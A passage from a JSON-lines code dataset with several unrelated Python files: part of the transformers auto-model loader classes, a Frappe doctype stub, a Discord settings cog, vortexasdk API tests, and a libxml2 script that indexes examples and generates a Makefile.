`bert`: BertForMaskedLM (Bert model)\n - contains `openai-gpt`: OpenAIGPTLMHeadModel (OpenAI GPT model)\n - contains `gpt2`: GPT2LMHeadModel (OpenAI GPT-2 model)\n - contains `transfo-xl`: TransfoXLLMHeadModel (Transformer-XL model)\n - contains `xlnet`: XLNetLMHeadModel (XLNet model)\n - contains `xlm`: XLMWithLMHeadModel (XLM model)\n - contains `ctrl`: CTRLLMHeadModel (Salesforce CTRL model)\n\n This class cannot be instantiated using `__init__()` (throws an error).\n \"\"\"\n def __init__(self):\n raise EnvironmentError(\"AutoModelWithLMHead is designed to be instantiated \"\n \"using the `AutoModelWithLMHead.from_pretrained(pretrained_model_name_or_path)` method.\")\n\n @classmethod\n def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):\n r\"\"\" Instantiates one of the language modeling model classes of the library\n from a pre-trained model configuration.\n\n The `from_pretrained()` method takes care of returning the correct model class instance\n using pattern matching on the `pretrained_model_name_or_path` string.\n\n The model class to instantiate is selected as the first pattern matching\n in the `pretrained_model_name_or_path` string (in the following order):\n - contains `t5`: T5ModelWithLMHead (T5 model)\n - contains `distilbert`: DistilBertForMaskedLM (DistilBERT model)\n - contains `albert`: AlbertForMaskedLM (ALBERT model)\n - contains `camembert`: CamembertForMaskedLM (CamemBERT model)\n - contains `roberta`: RobertaForMaskedLM (RoBERTa model)\n - contains `bert`: BertForMaskedLM (Bert model)\n - contains `openai-gpt`: OpenAIGPTLMHeadModel (OpenAI GPT model)\n - contains `gpt2`: GPT2LMHeadModel (OpenAI GPT-2 model)\n - contains `transfo-xl`: TransfoXLLMHeadModel (Transformer-XL model)\n - contains `xlnet`: XLNetLMHeadModel (XLNet model)\n - contains `xlm`: XLMWithLMHeadModel (XLM model)\n - contains `ctrl`: CTRLLMHeadModel (Salesforce CTRL model)\n\n The model is set in evaluation mode by default using `model.eval()` (Dropout modules are deactivated)\n To train the model, you should first set it back in training mode with `model.train()`\n\n Params:\n pretrained_model_name_or_path: either:\n\n - a string with the `shortcut name` of a pre-trained model to load from cache or download, e.g.: ``bert-base-uncased``.\n - a string with the `identifier name` of a pre-trained model that was user-uploaded to our S3, e.g.: 
``dbmdz/bert-base-german-cased``.\n - a path to a `directory` containing model weights saved using :func:`~transformers.PreTrainedModel.save_pretrained`, e.g.: ``./my_model_directory/``.\n - a path or url to a `tensorflow index checkpoint file` (e.g. `./tf_model/model.ckpt.index`). In this case, ``from_tf`` should be set to True and a configuration object should be provided as ``config`` argument. This loading path is slower than converting the TensorFlow checkpoint in a PyTorch model using the provided conversion scripts and loading the PyTorch model afterwards.\n\n model_args: (`optional`) Sequence of positional arguments:\n All remaning positional arguments will be passed to the underlying model's ``__init__`` method\n\n config: (`optional`) instance of a class derived from :class:`~transformers.PretrainedConfig`:\n Configuration for the model to use instead of an automatically loaded configuation. Configuration can be automatically loaded when:\n\n - the model is a model provided by the library (loaded with the ``shortcut-name`` string of a pretrained model), or\n - the model was saved using :func:`~transformers.PreTrainedModel.save_pretrained` and is reloaded by suppling the save directory.\n - the model is loaded by suppling a local directory as ``pretrained_model_name_or_path`` and a configuration JSON file named `config.json` is found in the directory.\n\n state_dict: (`optional`) dict:\n an optional state dictionnary for the model to use instead of a state dictionary loaded from saved weights file.\n This option can be used if you want to create a model from a pretrained configuration but load your own weights.\n In this case though, you should check if using :func:`~transformers.PreTrainedModel.save_pretrained` and :func:`~transformers.PreTrainedModel.from_pretrained` is not a simpler option.\n\n cache_dir: (`optional`) string:\n Path to a directory in which a downloaded pre-trained model\n configuration should be cached if the standard cache should not be used.\n\n force_download: (`optional`) boolean, default False:\n Force to (re-)download the model weights and configuration files and override the cached versions if they exists.\n resume_download: (`optional`) boolean, default False:\n Do not delete incompletely recieved file. Attempt to resume the download if such a file exists.\n\n proxies: (`optional`) dict, default None:\n A dictionary of proxy servers to use by protocol or endpoint, e.g.: {'http': 'foo.bar:3128', 'http://hostname': 'foo.bar:4012'}.\n The proxies are used on each request.\n\n output_loading_info: (`optional`) boolean:\n Set to ``True`` to also return a dictionnary containing missing keys, unexpected keys and error messages.\n\n kwargs: (`optional`) Remaining dictionary of keyword arguments:\n Can be used to update the configuration object (after it being loaded) and initiate the model. (e.g. ``output_attention=True``). Behave differently depending on whether a `config` is provided or automatically loaded:\n\n - If a configuration is provided with ``config``, ``**kwargs`` will be directly passed to the underlying model's ``__init__`` method (we assume all relevant updates to the configuration have already been done)\n - If a configuration is not provided, ``kwargs`` will be first passed to the configuration class initialization function (:func:`~transformers.PretrainedConfig.from_pretrained`). Each key of ``kwargs`` that corresponds to a configuration attribute will be used to override said attribute with the supplied ``kwargs`` value. 
Remaining keys that do not correspond to any configuration attribute will be passed to the underlying model's ``__init__`` function.\n\n Examples::\n\n model = AutoModelWithLMHead.from_pretrained('bert-base-uncased') # Download model and configuration from S3 and cache.\n model = AutoModelWithLMHead.from_pretrained('./test/bert_model/') # E.g. model was saved using `save_pretrained('./test/saved_model/')`\n model = AutoModelWithLMHead.from_pretrained('bert-base-uncased', output_attention=True) # Update configuration during loading\n assert model.config.output_attention == True\n # Loading from a TF checkpoint file instead of a PyTorch model (slower)\n config = AutoConfig.from_json_file('./tf_model/bert_tf_model_config.json')\n model = AutoModelWithLMHead.from_pretrained('./tf_model/bert_tf_checkpoint.ckpt.index', from_tf=True, config=config)\n\n \"\"\"\n if 't5' in pretrained_model_name_or_path:\n return T5WithLMHeadModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'distilbert' in pretrained_model_name_or_path:\n return DistilBertForMaskedLM.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'albert' in pretrained_model_name_or_path:\n return AlbertForMaskedLM.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'camembert' in pretrained_model_name_or_path:\n return CamembertForMaskedLM.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'roberta' in pretrained_model_name_or_path:\n return RobertaForMaskedLM.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'bert' in pretrained_model_name_or_path:\n return BertForMaskedLM.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'openai-gpt' in pretrained_model_name_or_path:\n return OpenAIGPTLMHeadModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'gpt2' in pretrained_model_name_or_path:\n return GPT2LMHeadModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'transfo-xl' in pretrained_model_name_or_path:\n return TransfoXLLMHeadModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'xlnet' in pretrained_model_name_or_path:\n return XLNetLMHeadModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'xlm' in pretrained_model_name_or_path:\n return XLMWithLMHeadModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'ctrl' in pretrained_model_name_or_path:\n return CTRLLMHeadModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n raise ValueError(\"Unrecognized model identifier in {}. 
Should contains one of \"\n \"'bert', 'openai-gpt', 'gpt2', 'transfo-xl', 'xlnet', \"\n \"'xlm', 'roberta','ctrl', 'distilbert', 'camembert', 'albert'\".format(pretrained_model_name_or_path))\n\n\nclass AutoModelForSequenceClassification(object):\n r\"\"\"\n :class:`~transformers.AutoModelForSequenceClassification` is a generic model class\n that will be instantiated as one of the sequence classification model classes of the library\n when created with the `AutoModelForSequenceClassification.from_pretrained(pretrained_model_name_or_path)`\n class method.\n\n The `from_pretrained()` method takes care of returning the correct model class instance\n using pattern matching on the `pretrained_model_name_or_path` string.\n\n The model class to instantiate is selected as the first pattern matching\n in the `pretrained_model_name_or_path` string (in the following order):\n - contains `distilbert`: DistilBertForSequenceClassification (DistilBERT model)\n - contains `albert`: AlbertForSequenceClassification (ALBERT model)\n - contains `camembert`: CamembertForSequenceClassification (CamemBERT model)\n - contains `roberta`: RobertaForSequenceClassification (RoBERTa model)\n - contains `bert`: BertForSequenceClassification (Bert model)\n - contains `xlnet`: XLNetForSequenceClassification (XLNet model)\n - contains `xlm`: XLMForSequenceClassification (XLM model)\n\n This class cannot be instantiated using `__init__()` (throws an error).\n \"\"\"\n def __init__(self):\n raise EnvironmentError(\"AutoModelWithLMHead is designed to be instantiated \"\n \"using the `AutoModelWithLMHead.from_pretrained(pretrained_model_name_or_path)` method.\")\n\n @classmethod\n def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):\n r\"\"\" Instantiates one of the sequence classification model classes of the library\n from a pre-trained model configuration.\n\n The `from_pretrained()` method takes care of returning the correct model class instance\n using pattern matching on the `pretrained_model_name_or_path` string.\n\n The model class to instantiate is selected as the first pattern matching\n in the `pretrained_model_name_or_path` string (in the following order):\n - contains `distilbert`: DistilBertForSequenceClassification (DistilBERT model)\n - contains `albert`: AlbertForSequenceClassification (ALBERT model)\n - contains `camembert`: CamembertForSequenceClassification (CamemBERT model)\n - contains `roberta`: RobertaForSequenceClassification (RoBERTa model)\n - contains `bert`: BertForSequenceClassification (Bert model)\n - contains `xlnet`: XLNetForSequenceClassification (XLNet model)\n - contains `xlm`: XLMForSequenceClassification (XLM model)\n\n The model is set in evaluation mode by default using `model.eval()` (Dropout modules are deactivated)\n To train the model, you should first set it back in training mode with `model.train()`\n\n Params:\n pretrained_model_name_or_path: either:\n\n - a string with the `shortcut name` of a pre-trained model to load from cache or download, e.g.: ``bert-base-uncased``.\n - a string with the `identifier name` of a pre-trained model that was user-uploaded to our S3, e.g.: ``dbmdz/bert-base-german-cased``.\n - a path to a `directory` containing model weights saved using :func:`~transformers.PreTrainedModel.save_pretrained`, e.g.: ``./my_model_directory/``.\n - a path or url to a `tensorflow index checkpoint file` (e.g. `./tf_model/model.ckpt.index`). 
In this case, ``from_tf`` should be set to True and a configuration object should be provided as ``config`` argument. This loading path is slower than converting the TensorFlow checkpoint in a PyTorch model using the provided conversion scripts and loading the PyTorch model afterwards.\n\n model_args: (`optional`) Sequence of positional arguments:\n All remaning positional arguments will be passed to the underlying model's ``__init__`` method\n\n config: (`optional`) instance of a class derived from :class:`~transformers.PretrainedConfig`:\n Configuration for the model to use instead of an automatically loaded configuation. Configuration can be automatically loaded when:\n\n - the model is a model provided by the library (loaded with the ``shortcut-name`` string of a pretrained model), or\n - the model was saved using :func:`~transformers.PreTrainedModel.save_pretrained` and is reloaded by suppling the save directory.\n - the model is loaded by suppling a local directory as ``pretrained_model_name_or_path`` and a configuration JSON file named `config.json` is found in the directory.\n\n state_dict: (`optional`) dict:\n an optional state dictionnary for the model to use instead of a state dictionary loaded from saved weights file.\n This option can be used if you want to create a model from a pretrained configuration but load your own weights.\n In this case though, you should check if using :func:`~transformers.PreTrainedModel.save_pretrained` and :func:`~transformers.PreTrainedModel.from_pretrained` is not a simpler option.\n\n cache_dir: (`optional`) string:\n Path to a directory in which a downloaded pre-trained model\n configuration should be cached if the standard cache should not be used.\n\n force_download: (`optional`) boolean, default False:\n Force to (re-)download the model weights and configuration files and override the cached versions if they exists.\n\n resume_download: (`optional`) boolean, default False:\n Do not delete incompletely recieved file. Attempt to resume the download if such a file exists.\n\n proxies: (`optional`) dict, default None:\n A dictionary of proxy servers to use by protocol or endpoint, e.g.: {'http': 'foo.bar:3128', 'http://hostname': 'foo.bar:4012'}.\n The proxies are used on each request.\n\n output_loading_info: (`optional`) boolean:\n Set to ``True`` to also return a dictionnary containing missing keys, unexpected keys and error messages.\n\n kwargs: (`optional`) Remaining dictionary of keyword arguments:\n Can be used to update the configuration object (after it being loaded) and initiate the model. (e.g. ``output_attention=True``). Behave differently depending on whether a `config` is provided or automatically loaded:\n\n - If a configuration is provided with ``config``, ``**kwargs`` will be directly passed to the underlying model's ``__init__`` method (we assume all relevant updates to the configuration have already been done)\n - If a configuration is not provided, ``kwargs`` will be first passed to the configuration class initialization function (:func:`~transformers.PretrainedConfig.from_pretrained`). Each key of ``kwargs`` that corresponds to a configuration attribute will be used to override said attribute with the supplied ``kwargs`` value. 
Remaining keys that do not correspond to any configuration attribute will be passed to the underlying model's ``__init__`` function.\n\n Examples::\n\n model = AutoModelForSequenceClassification.from_pretrained('bert-base-uncased') # Download model and configuration from S3 and cache.\n model = AutoModelForSequenceClassification.from_pretrained('./test/bert_model/') # E.g. model was saved using `save_pretrained('./test/saved_model/')`\n model = AutoModelForSequenceClassification.from_pretrained('bert-base-uncased', output_attention=True) # Update configuration during loading\n assert model.config.output_attention == True\n # Loading from a TF checkpoint file instead of a PyTorch model (slower)\n config = AutoConfig.from_json_file('./tf_model/bert_tf_model_config.json')\n model = AutoModelForSequenceClassification.from_pretrained('./tf_model/bert_tf_checkpoint.ckpt.index', from_tf=True, config=config)\n\n \"\"\"\n if 'distilbert' in pretrained_model_name_or_path:\n return DistilBertForSequenceClassification.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'albert' in pretrained_model_name_or_path:\n return AlbertForSequenceClassification.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'camembert' in pretrained_model_name_or_path:\n return CamembertForSequenceClassification.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'roberta' in pretrained_model_name_or_path:\n return RobertaForSequenceClassification.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'bert' in pretrained_model_name_or_path:\n return BertForSequenceClassification.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'xlnet' in pretrained_model_name_or_path:\n return XLNetForSequenceClassification.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'xlm' in pretrained_model_name_or_path:\n return XLMForSequenceClassification.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n\n raise ValueError(\"Unrecognized model identifier in {}. 
Should contains one of \"\n \"'bert', 'xlnet', 'xlm', 'roberta', 'distilbert', 'camembert', 'albert'\".format(pretrained_model_name_or_path))\n\n\nclass AutoModelForQuestionAnswering(object):\n r\"\"\"\n :class:`~transformers.AutoModelForQuestionAnswering` is a generic model class\n that will be instantiated as one of the question answering model classes of the library\n when created with the `AutoModelForQuestionAnswering.from_pretrained(pretrained_model_name_or_path)`\n class method.\n\n The `from_pretrained()` method takes care of returning the correct model class instance\n using pattern matching on the `pretrained_model_name_or_path` string.\n\n The model class to instantiate is selected as the first pattern matching\n in the `pretrained_model_name_or_path` string (in the following order):\n - contains `distilbert`: DistilBertForQuestionAnswering (DistilBERT model)\n - contains `albert`: AlbertForQuestionAnswering (ALBERT model)\n - contains `bert`: BertForQuestionAnswering (Bert model)\n - contains `xlnet`: XLNetForQuestionAnswering (XLNet model)\n - contains `xlm`: XLMForQuestionAnswering (XLM model)\n\n This class cannot be instantiated using `__init__()` (throws an error).\n \"\"\"\n def __init__(self):\n raise EnvironmentError(\"AutoModelWithLMHead is designed to be instantiated \"\n \"using the `AutoModelWithLMHead.from_pretrained(pretrained_model_name_or_path)` method.\")\n\n @classmethod\n def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):\n r\"\"\" Instantiates one of the question answering model classes of the library\n from a pre-trained model configuration.\n\n The `from_pretrained()` method takes care of returning the correct model class instance\n using pattern matching on the `pretrained_model_name_or_path` string.\n\n The model class to instantiate is selected as the first pattern matching\n in the `pretrained_model_name_or_path` string (in the following order):\n - contains `distilbert`: DistilBertForQuestionAnswering (DistilBERT model)\n - contains `albert`: AlbertForQuestionAnswering (ALBERT model)\n - contains `bert`: BertForQuestionAnswering (Bert model)\n - contains `xlnet`: XLNetForQuestionAnswering (XLNet model)\n - contains `xlm`: XLMForQuestionAnswering (XLM model)\n\n The model is set in evaluation mode by default using `model.eval()` (Dropout modules are deactivated)\n To train the model, you should first set it back in training mode with `model.train()`\n\n Params:\n pretrained_model_name_or_path: either:\n\n - a string with the `shortcut name` of a pre-trained model to load from cache or download, e.g.: ``bert-base-uncased``.\n - a string with the `identifier name` of a pre-trained model that was user-uploaded to our S3, e.g.: ``dbmdz/bert-base-german-cased``.\n - a path to a `directory` containing model weights saved using :func:`~transformers.PreTrainedModel.save_pretrained`, e.g.: ``./my_model_directory/``.\n - a path or url to a `tensorflow index checkpoint file` (e.g. `./tf_model/model.ckpt.index`). In this case, ``from_tf`` should be set to True and a configuration object should be provided as ``config`` argument. 
This loading path is slower than converting the TensorFlow checkpoint to a PyTorch model using the provided conversion scripts and loading the PyTorch model afterwards.\n\n            model_args: (`optional`) Sequence of positional arguments:\n                All remaining positional arguments will be passed to the underlying model's ``__init__`` method\n\n            config: (`optional`) instance of a class derived from :class:`~transformers.PretrainedConfig`:\n                Configuration for the model to use instead of an automatically loaded configuration. Configuration can be automatically loaded when:\n\n                - the model is a model provided by the library (loaded with the ``shortcut-name`` string of a pretrained model), or\n                - the model was saved using :func:`~transformers.PreTrainedModel.save_pretrained` and is reloaded by supplying the save directory.\n                - the model is loaded by supplying a local directory as ``pretrained_model_name_or_path`` and a configuration JSON file named `config.json` is found in the directory.\n\n            state_dict: (`optional`) dict:\n                an optional state dictionary for the model to use instead of a state dictionary loaded from the saved weights file.\n                This option can be used if you want to create a model from a pretrained configuration but load your own weights.\n                In this case though, you should check if using :func:`~transformers.PreTrainedModel.save_pretrained` and :func:`~transformers.PreTrainedModel.from_pretrained` is not a simpler option.\n\n            cache_dir: (`optional`) string:\n                Path to a directory in which a downloaded pre-trained model\n                configuration should be cached if the standard cache should not be used.\n\n            force_download: (`optional`) boolean, default False:\n                Force (re-)downloading the model weights and configuration files and override the cached versions if they exist.\n\n            proxies: (`optional`) dict, default None:\n                A dictionary of proxy servers to use by protocol or endpoint, e.g.: {'http': 'foo.bar:3128', 'http://hostname': 'foo.bar:4012'}.\n                The proxies are used on each request.\n\n            output_loading_info: (`optional`) boolean:\n                Set to ``True`` to also return a dictionary containing missing keys, unexpected keys and error messages.\n\n            kwargs: (`optional`) Remaining dictionary of keyword arguments:\n                Can be used to update the configuration object (after it has been loaded) and initialize the model (e.g. ``output_attention=True``). This behaves differently depending on whether a `config` is provided or automatically loaded:\n\n                - If a configuration is provided with ``config``, ``**kwargs`` will be directly passed to the underlying model's ``__init__`` method (we assume all relevant updates to the configuration have already been done)\n                - If a configuration is not provided, ``kwargs`` will be first passed to the configuration class initialization function (:func:`~transformers.PretrainedConfig.from_pretrained`). Each key of ``kwargs`` that corresponds to a configuration attribute will be used to override said attribute with the supplied ``kwargs`` value. Remaining keys that do not correspond to any configuration attribute will be passed to the underlying model's ``__init__`` function.\n\n        Examples::\n\n            model = AutoModelForQuestionAnswering.from_pretrained('bert-base-uncased')    # Download model and configuration from S3 and cache.\n            model = AutoModelForQuestionAnswering.from_pretrained('./test/bert_model/')  # E.g. 
model was saved using `save_pretrained('./test/saved_model/')`\n model = AutoModelForQuestionAnswering.from_pretrained('bert-base-uncased', output_attention=True) # Update configuration during loading\n assert model.config.output_attention == True\n # Loading from a TF checkpoint file instead of a PyTorch model (slower)\n config = AutoConfig.from_json_file('./tf_model/bert_tf_model_config.json')\n model = AutoModelForQuestionAnswering.from_pretrained('./tf_model/bert_tf_checkpoint.ckpt.index', from_tf=True, config=config)\n\n \"\"\"\n if 'distilbert' in pretrained_model_name_or_path:\n return DistilBertForQuestionAnswering.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'albert' in pretrained_model_name_or_path:\n return AlbertForQuestionAnswering.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'bert' in pretrained_model_name_or_path:\n return BertForQuestionAnswering.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'xlnet' in pretrained_model_name_or_path:\n return XLNetForQuestionAnswering.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'xlm' in pretrained_model_name_or_path:\n return XLMForQuestionAnswering.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n\n raise ValueError(\"Unrecognized model identifier in {}. Should contains one of \"\n \"'bert', 'xlnet', 'xlm', 'distilbert', 'albert'\".format(pretrained_model_name_or_path))\n"} {"ext": "py", "sha": "1a30ea9efd97c86ae7beb4c6844d41e1b16c8874", "content": "# -*- coding: utf-8 -*-\n# Copyright (c) 2019, Dirk van der Laarse and contributors\n# For license information, please see license.txt\n\nfrom __future__ import unicode_literals\nimport frappe\nfrom frappe.model.document import Document\n\nclass ProductLineProcessFlowWorkstation(Document):\n\tpass\n"} {"ext": "py", "sha": "1a30eabab07b631bdf05a2a6304a39b2b7499eb8", "content": "import discord\nfrom discord.ext import commands\n\nfrom Core.Commands.Settings.Functions.change_prefix import ChangePrefix\nfrom Core.Commands.Settings.Functions.change_status import ChangeStatus\n\n\nclass Settings(commands.Cog):\n \"\"\"Class contains commands with settings\n \"\"\"\n def __init__(self, bot):\n \"\"\"Constructor method\n \"\"\"\n self.bot = bot\n self.bot.add_cog(ChangePrefix(bot))\n self.bot.add_cog(ChangeStatus(bot))\n\n"} {"ext": "py", "sha": "1a30ead097047a3eb1e86ebf29d6a99bffac034f", "content": "from datetime import datetime\nfrom vortexasdk import FleetUtilisationOriginBreakdown\n\n\nfrom docs.utils import to_markdown\nfrom tests.testcases import TestCaseUsingRealAPI\n\n\nclass TestFleetUtilisationOriginBreakdownReal(TestCaseUsingRealAPI):\n def test_search_returns_one_day(self):\n date = datetime(2019, 11, 10)\n\n result = FleetUtilisationOriginBreakdown().search(\n filter_time_min=date,\n filter_time_max=date\n )\n\n assert len(result) > 0\n\n def test_to_df(self):\n start = datetime(2019, 11, 1)\n end = datetime(2019, 11, 10)\n\n df = (\n FleetUtilisationOriginBreakdown()\n .search(\n filter_time_min=start,\n filter_time_max=end\n )\n .to_df()\n )\n\n assert list(df.columns) == [\"key\", \"label\", \"value\", \"count\"]\n\n def test_with_params(self):\n start = datetime(2020, 10, 18)\n end = datetime(2021, 1, 18)\n\n df = (\n FleetUtilisationOriginBreakdown()\n .search(\n filter_time_min=start,\n filter_time_max=end,\n breakdown_size='5',\n breakdown_geography='country'\n )\n .to_df()\n )\n\n assert len(df) == 5\n\n def test_to_list(self):\n start 
= datetime(2019, 11, 1)\n end = datetime(2019, 11, 10)\n\n time_series_list = (\n FleetUtilisationOriginBreakdown()\n .search(\n filter_time_min=start,\n filter_time_max=end\n )\n .to_list()\n )\n\n assert len(time_series_list) > 0\n"} {"ext": "py", "sha": "1a30eb0238537dabf2d2fec11f2651c297c645a4", "content": "#!/usr/bin/python -u\n#\n# Indexes the examples and build an XML description\n#\nimport string\nimport glob\nimport sys\ntry:\n import libxml2\nexcept:\n sys.exit(1)\nsys.path.insert(0, \"..\")\nfrom apibuild import CParser, escape\n\nexamples = []\nextras = ['examples.xsl', 'index.py']\ntests = []\nsections = {}\nsymbols = {}\napi_dict = None\napi_doc = None\n\ndef load_api():\n global api_dict\n global api_doc\n\n if api_dict != None:\n return\n api_dict = {}\n try:\n print \"loading ../libxml2-api.xml\"\n api_doc = libxml2.parseFile(\"../libxml2-api.xml\")\n except:\n print \"failed to parse ../libxml2-api.xml\"\n\tsys.exit(1)\n\ndef find_symbol(name):\n global api_dict\n global api_doc\n\n if api_doc == None:\n load_api()\n\n if name == None:\n return\n if api_dict.has_key(name):\n return api_dict[name]\n ctxt = api_doc.xpathNewContext()\n res = ctxt.xpathEval(\"/api/symbols/*[@name = '%s']\" % (name))\n if type(res) == type([]) and len(res) >= 1:\n if len(res) > 1:\n\t print \"Found %d references to %s in the API\" % (len(res), name)\n\tnode = res[0]\n\ttyp = node.name\n\tfile = node.xpathEval(\"string(@file)\")\n\tinfo = node.xpathEval(\"string(info)\")\n else:\n print \"Reference %s not found in the API\" % (name)\n\treturn None\n ret = (typ, file, info)\n api_dict[name] = ret\n return ret\n\ndef parse_top_comment(filename, comment):\n res = {}\n lines = string.split(comment, \"\\n\")\n item = None\n for line in lines:\n while line != \"\" and (line[0] == ' ' or line[0] == '\\t'):\n\t line = line[1:]\n while line != \"\" and line[0] == '*':\n\t line = line[1:]\n while line != \"\" and (line[0] == ' ' or line[0] == '\\t'):\n\t line = line[1:]\n\ttry:\n\t (it, line) = string.split(line, \":\", 1)\n\t item = it\n\t while line != \"\" and (line[0] == ' ' or line[0] == '\\t'):\n\t\tline = line[1:]\n\t if res.has_key(item):\n\t res[item] = res[item] + \" \" + line\n\t else:\n\t\tres[item] = line\n\texcept:\n\t if item != None:\n\t if res.has_key(item):\n\t\t res[item] = res[item] + \" \" + line\n\t\telse:\n\t\t res[item] = line\n return res\n\ndef parse(filename, output):\n global symbols\n global sections\n\n parser = CParser(filename)\n parser.collect_references()\n idx = parser.parse()\n info = parse_top_comment(filename, parser.top_comment)\n output.write(\" <example filename='%s'>\\n\" % filename)\n try:\n synopsis = info['synopsis']\n\toutput.write(\" <synopsis>%s</synopsis>\\n\" % escape(synopsis));\n except:\n print \"Example %s lacks a synopsis description\" % (filename)\n try:\n purpose = info['purpose']\n\toutput.write(\" <purpose>%s</purpose>\\n\" % escape(purpose));\n except:\n print \"Example %s lacks a purpose description\" % (filename)\n try:\n usage = info['usage']\n\toutput.write(\" <usage>%s</usage>\\n\" % escape(usage));\n except:\n print \"Example %s lacks an usage description\" % (filename)\n try:\n test = info['test']\n\toutput.write(\" <test>%s</test>\\n\" % escape(test));\n\tprogname=filename[0:-2]\n\tcommand=string.replace(test, progname, './' + progname, 1)\n\ttests.append(command)\n except:\n pass\n try:\n author = info['author']\n\toutput.write(\" <author>%s</author>\\n\" % escape(author));\n except:\n print \"Example %s lacks an author description\" % 
(filename)\n try:\n copy = info['copy']\n\toutput.write(\" <copy>%s</copy>\\n\" % escape(copy));\n except:\n print \"Example %s lacks a copyright description\" % (filename)\n try:\n section = info['section']\n\toutput.write(\" <section>%s</section>\\n\" % escape(section));\n\tif sections.has_key(section):\n\t sections[section].append(filename)\n\telse:\n\t sections[section] = [filename]\n except:\n print \"Example %s lacks a section description\" % (filename)\n for topic in info.keys():\n if topic != \"purpose\" and topic != \"usage\" and \\\n\t topic != \"author\" and topic != \"copy\" and \\\n\t topic != \"section\" and topic != \"synopsis\" and topic != \"test\":\n\t str = info[topic]\n\t output.write(\" <extra topic='%s'>%s</extra>\\n\" % (\n\t escape(topic), escape(str)))\n output.write(\" <includes>\\n\")\n for include in idx.includes.keys():\n if include.find(\"libxml\") != -1:\n\t output.write(\" <include>%s</include>\\n\" % (escape(include)))\n output.write(\" </includes>\\n\")\n output.write(\" <uses>\\n\")\n for ref in idx.references.keys():\n id = idx.references[ref]\n\tname = id.get_name()\n\tline = id.get_lineno()\n\tif symbols.has_key(name):\n\t sinfo = symbols[name]\n\t refs = sinfo[0]\n\t # gather at most 5 references per symbols\n\t if refs > 5:\n\t continue\n\t sinfo.append(filename)\n\t sinfo[0] = refs + 1\n\telse:\n\t symbols[name] = [1, filename]\n\tinfo = find_symbol(name)\n\tif info != None:\n\t type = info[0]\n\t file = info[1]\n\t output.write(\" <%s line='%d' file='%s' name='%s'/>\\n\" % (type,\n\t line, file, name))\n\telse:\n\t type = id.get_type()\n\t output.write(\" <%s line='%d' name='%s'/>\\n\" % (type,\n\t line, name))\n\t \n output.write(\" </uses>\\n\")\n output.write(\" </example>\\n\")\n \n return idx\n\ndef dump_symbols(output):\n global symbols\n\n output.write(\" <symbols>\\n\")\n keys = symbols.keys()\n keys.sort()\n for symbol in keys:\n output.write(\" <symbol name='%s'>\\n\" % (symbol))\n\tinfo = symbols[symbol]\n\ti = 1\n\twhile i < len(info):\n\t output.write(\" <ref filename='%s'/>\\n\" % (info[i]))\n\t i = i + 1\n output.write(\" </symbol>\\n\")\n output.write(\" </symbols>\\n\")\n\ndef dump_sections(output):\n global sections\n\n output.write(\" <sections>\\n\")\n keys = sections.keys()\n keys.sort()\n for section in keys:\n output.write(\" <section name='%s'>\\n\" % (section))\n\tinfo = sections[section]\n\ti = 0\n\twhile i < len(info):\n\t output.write(\" <example filename='%s'/>\\n\" % (info[i]))\n\t i = i + 1\n output.write(\" </section>\\n\")\n output.write(\" </sections>\\n\")\n\ndef dump_Makefile():\n for file in glob.glob('*.xml'):\n extras.append(file)\n for file in glob.glob('*.res'):\n extras.append(file)\n Makefile=\"\"\"# Beware this is autogenerated by index.py\nINCLUDES = -I$(top_builddir)/include -I$(top_srcdir)/include -I@srcdir@/include @THREAD_CFLAGS@ @Z_CFLAGS@\nDEPS = $(top_builddir)/libxml2rr.la\nLDADDS = @STATIC_BINARIES@ $(top_builddir)/libxml2rr.la @THREAD_LIBS@ @Z_LIBS@ $(ICONV_LIBS) -lm @WIN32_EXTRA_LIBADD@\n\nrebuild: examples.xml index.html\n\nexamples.xml: index.py *.c\n\t-@($(srcdir)/index.py)\n\nindex.html: examples.xml examples.xsl\n\t-@(xsltproc examples.xsl examples.xml && echo \"Rebuilt web page\" && xmllint --valid --noout index.html)\n\ninstall-data-local: \n\t$(mkinstalldirs) $(DESTDIR)$(HTML_DIR)\n\t-@INSTALL@ -m 0644 $(srcdir)/*.html $(srcdir)/*.c $(srcdir)/*.xml $(srcdir)/*.xsl $(srcdir)/*.res $(DESTDIR)$(HTML_DIR)\n\n\"\"\"\n EXTRA_DIST=\"\"\n for extra in extras:\n EXTRA_DIST = EXTRA_DIST + extra 
